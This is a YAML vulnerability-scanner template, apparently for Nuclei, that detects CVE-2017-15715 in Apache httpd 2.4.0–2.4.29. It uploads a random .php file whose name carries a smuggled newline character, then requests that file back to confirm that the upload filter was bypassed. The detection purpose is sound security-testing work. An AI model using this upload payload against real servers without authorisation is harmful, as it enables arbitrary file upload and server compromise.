47 lines
1.5 KiB
YAML
47 lines
1.5 KiB
YAML
id: CVE-2017-15715
|
|
|
|
info:
|
|
name: Apache Arbitrary File Upload
|
|
author: geeknik
|
|
severity: high
|
|
description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in <FilesMatch> could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could
|
|
be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.
|
|
reference:
|
|
- https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.1
|
|
cve-id: CVE-2017-15715
|
|
cwe-id: CWE-20
|
|
tags: cve,cve2017,apache,httpd,fileupload
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ
|
|
|
|
------WebKitFormBoundaryKc8fBVDo558U4hbJ
|
|
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
|
|
|
|
{{randstr_1}}
|
|
|
|
------WebKitFormBoundaryKc8fBVDo558U4hbJ
|
|
Content-Disposition: form-data; name="name"
|
|
|
|
{{randstr}}.php\x0A
|
|
------WebKitFormBoundaryKc8fBVDo558U4hbJ--
|
|
|
|
- |
|
|
GET /{{randstr}}.php\x0A HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept-Encoding: gzip,deflate
|
|
Accept: */*
|
|
|
|
req-condition: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body_2, "{{randstr_1}}")'
|